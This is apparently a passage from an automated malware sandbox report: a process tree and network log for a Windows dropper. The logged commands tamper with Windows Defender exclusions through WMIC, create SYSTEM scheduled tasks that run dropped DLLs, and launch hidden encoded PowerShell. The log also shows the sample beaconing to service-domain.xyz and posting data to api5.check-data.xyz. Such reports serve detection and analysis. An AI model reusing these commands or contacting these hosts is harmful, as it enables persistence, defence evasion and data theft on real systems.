                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1412
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:2004
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2024
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2344
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:580
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OniiUkVuU\xpcHPg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yDlQlQjTItyRqSH" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2436
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "yDlQlQjTItyRqSH2" /F /xml "C:\Program Files (x86)\OniiUkVuU\ZBTPGyo.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:548
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "yDlQlQjTItyRqSH"
                                                                                                    3⤵
                                                                                                      PID:840
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "yDlQlQjTItyRqSH"
                                                                                                      3⤵
                                                                                                        PID:1988
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "JTZgHJltaGFKim" /F /xml "C:\Program Files (x86)\NFFblPWVSTUU2\ZcASiPD.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2568
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "ebqgbGspXpXbN2" /F /xml "C:\ProgramData\RfQdYYQjhFJxkqVB\qWvhJeI.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2536
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "fKsAjLTIAPWjkpmTj2" /F /xml "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\XkZlrsM.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2852
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "etkoUubEiiZzrHIDvkg2" /F /xml "C:\Program Files (x86)\oMPLyiqsgsRtC\xaXYsNF.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2100
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "DxfwWIkYFsDOIQKWf" /SC once /ST 04:28:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll\",#1 /wKdidbma 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1980
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "DxfwWIkYFsDOIQKWf"
                                                                                                        3⤵
                                                                                                          PID:2888
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "akamOyUwOLVWEybrw"
                                                                                                          3⤵
                                                                                                            PID:2456
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 1556
                                                                                                            3⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Program crash
                                                                                                            PID:2312
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll",#1 /wKdidbma 525403
                                                                                                          2⤵
                                                                                                            PID:2436
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll",#1 /wKdidbma 525403
                                                                                                              3⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in System32 directory
                                                                                                              • Enumerates system info in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:1104
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "DxfwWIkYFsDOIQKWf"
                                                                                                                4⤵
                                                                                                                  PID:1772
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {46099B70-78A5-46BF-95EC-F9E2C0113173} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
                                                                                                            1⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:596
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:580
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2360
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1700
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:3028
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2816
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    3⤵
                                                                                                                      PID:2040
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2356
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:1008
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2696

                                                                                                                      Network

                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        service-domain.xyz
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        service-domain.xyz
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        service-domain.xyz
                                                                                                                        IN A
                                                                                                                        54.210.117.250
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        c.pki.goog
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        c.pki.goog
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        c.pki.goog
                                                                                                                        IN CNAME
                                                                                                                        pki-goog.l.google.com
                                                                                                                        pki-goog.l.google.com
                                                                                                                        IN A
                                                                                                                        216.58.201.99
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://c.pki.goog/r/r1.crl
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /r/r1.crl HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: c.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                        Content-Length: 854
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: sffe
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        Date: Mon, 08 Jul 2024 04:24:42 GMT
                                                                                                                        Expires: Mon, 08 Jul 2024 05:14:42 GMT
                                                                                                                        Cache-Control: public, max-age=3000
                                                                                                                        Age: 2671
                                                                                                                        Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
                                                                                                                        Content-Type: application/pkix-crl
                                                                                                                        Vary: Accept-Encoding
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        o.pki.goog
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        o.pki.goog
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        o.pki.goog
                                                                                                                        IN CNAME
                                                                                                                        pki-goog.l.google.com
                                                                                                                        pki-goog.l.google.com
                                                                                                                        IN A
                                                                                                                        216.58.201.99
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCmrOqyXa%2F%2FgRBajssQLKXU
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCmrOqyXa%2F%2FgRBajssQLKXU HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: o.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Server: ocsp_responder
                                                                                                                        Content-Length: 472
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Mon, 08 Jul 2024 04:26:18 GMT
                                                                                                                        Cache-Control: public, max-age=14400
                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                        Age: 2575
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCRq%2FXldMamzQqGAD6YrjKf
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCRq%2FXldMamzQqGAD6YrjKf HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: o.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Server: ocsp_responder
                                                                                                                        Content-Length: 472
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Mon, 08 Jul 2024 04:57:36 GMT
                                                                                                                        Cache-Control: public, max-age=14400
                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                        Age: 698
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: o.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Server: ocsp_responder
                                                                                                                        Content-Length: 472
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Mon, 08 Jul 2024 04:52:40 GMT
                                                                                                                        Cache-Control: public, max-age=14400
                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                        Age: 994
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        clients2.google.com
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        clients2.google.com
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        clients2.google.com
                                                                                                                        IN CNAME
                                                                                                                        clients.l.google.com
                                                                                                                        clients.l.google.com
                                                                                                                        IN A
                                                                                                                        172.217.16.238
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        172.217.16.238:443
                                                                                                                        Request
                                                                                                                        GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM HTTP/1.1
                                                                                                                        Host: clients2.google.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Response
                                                                                                                        HTTP/1.1 302 Moved Temporarily
                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VPirn5WQt2DDWGCzpUrEEg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                        Date: Mon, 08 Jul 2024 05:09:14 GMT
                                                                                                                        Location: https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Server: GSE
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Accept-Ranges: none
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        IN CNAME
                                                                                                                        googlehosted.l.googleusercontent.com
                                                                                                                        googlehosted.l.googleusercontent.com
                                                                                                                        IN A
                                                                                                                        142.250.187.225
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        142.250.187.225:443
                                                                                                                        Request
                                                                                                                        GET /crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 26186
                                                                                                                        X-GUploader-UploadID: ACJd0No14a9cWpDCfJidUD--1SqA-a_1lg06-Kb2XDoudipli_3I37lAumPiv4I747-i1yWC9YA
                                                                                                                        X-Goog-Hash: crc32c=i5zIOg==
                                                                                                                        Server: UploadServer
                                                                                                                        Date: Sun, 07 Jul 2024 21:14:59 GMT
                                                                                                                        Expires: Mon, 07 Jul 2025 21:14:59 GMT
                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                        Age: 28455
                                                                                                                        Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                                        ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        api5.check-data.xyz
                                                                                                                        rundll32.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        api5.check-data.xyz
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        api5.check-data.xyz
                                                                                                                        IN CNAME
                                                                                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                        IN A
                                                                                                                        44.237.52.63
                                                                                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                        IN A
                                                                                                                        44.240.96.128
                                                                                                                      • flag-us
                                                                                                                        POST
                                                                                                                        http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                                        rundll32.exe
                                                                                                                        Remote address:
                                                                                                                        44.237.52.63:80
                                                                                                                        Request
                                                                                                                        POST /api2/google_api_ifi HTTP/1.1
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                        Host: api5.check-data.xyz
                                                                                                                        Content-Length: 720
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-control: no-cache="set-cookie"
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Date: Mon, 08 Jul 2024 05:07:23 GMT
                                                                                                                        Server: nginx
                                                                                                                        Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                        Content-Length: 0
                                                                                                                        Connection: keep-alive
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        tls
                                                                                                                        mqcBDmi.exe
                                                                                                                        399 B
                                                                                                                        219 B
                                                                                                                        5
                                                                                                                        5
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        tls
                                                                                                                        mqcBDmi.exe
                                                                                                                        361 B
                                                                                                                        219 B
                                                                                                                        5
                                                                                                                        5
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        tls
                                                                                                                        mqcBDmi.exe
                                                                                                                        334 B
                                                                                                                        219 B
                                                                                                                        6
                                                                                                                        5
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        mqcBDmi.exe
                                                                                                                        190 B
                                                                                                                        92 B
                                                                                                                        4
                                                                                                                        2
                                                                                                                      • 216.58.201.99:80
                                                                                                                        http://c.pki.goog/r/r1.crl
                                                                                                                        http
                                                                                                                        mqcBDmi.exe
                                                                                                                        348 B
                                                                                                                        1.7kB
                                                                                                                        5
                                                                                                                        4

                                                                                                                        HTTP Request

                                                                                                                        GET http://c.pki.goog/r/r1.crl

                                                                                                                        HTTP Response

                                                                                                                        200
                                                                                                                      • 216.58.201.99:80
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt
                                                                                                                        http
                                                                                                                        mqcBDmi.exe
                                                                                                                        1.1kB
                                                                                                                        2.3kB
                                                                                                                        8
                                                                                                                        5

                                                                                                                        HTTP Request

                                                                                                                        GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCmrOqyXa%2F%2FgRBajssQLKXU

                                                                                                                        HTTP Response

                                                                                                                        200

                                                                                                                        HTTP Request

                                                                                                                        GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCRq%2FXldMamzQqGAD6YrjKf

                                                                                                                        HTTP Response

                                                                                                                        200

                                                                                                                        HTTP Request

                                                                                                                        GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt

                                                                                                                        HTTP Response

                                                                                                                        200
                                                                                                                      • 172.217.16.238:443
                                                                                                                        https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM
                                                                                                                        tls, http
                                                                                                                        mqcBDmi.exe
                                                                                                                        1.1kB
                                                                                                                        8.6kB
                                                                                                                        10
                                                                                                                        12

                                                                                                                        HTTP Request

                                                                                                                        GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM

                                                                                                                        HTTP Response

                                                                                                                        302
                                                                                                                      • 142.250.187.225:443
                                                                                                                        https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        tls, http
                                                                                                                        mqcBDmi.exe
                                                                                                                        1.6kB
                                                                                                                        37.8kB
                                                                                                                        20
                                                                                                                        31

                                                                                                                        HTTP Request

                                                                                                                        GET https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx

                                                                                                                        HTTP Response

                                                                                                                        200
                                                                                                                      • 44.237.52.63:80
                                                                                                                        http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                                        http
                                                                                                                        rundll32.exe
                                                                                                                        1.2kB
                                                                                                                        536 B
                                                                                                                        5
                                                                                                                        3

                                                                                                                        HTTP Request

                                                                                                                        POST http://api5.check-data.xyz/api2/google_api_ifi

                                                                                                                        HTTP Response

                                                                                                                        200
                                                                                                                      • 8.8.8.8:53
                                                                                                                        service-domain.xyz
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        64 B
                                                                                                                        80 B
                                                                                                                        1
                                                                                                                        1

                                                                                                                        DNS Request

                                                                                                                        service-domain.xyz

                                                                                                                        DNS Response

                                                                                                                        54.210.117.250

                                                                                                                      • 8.8.8.8:53
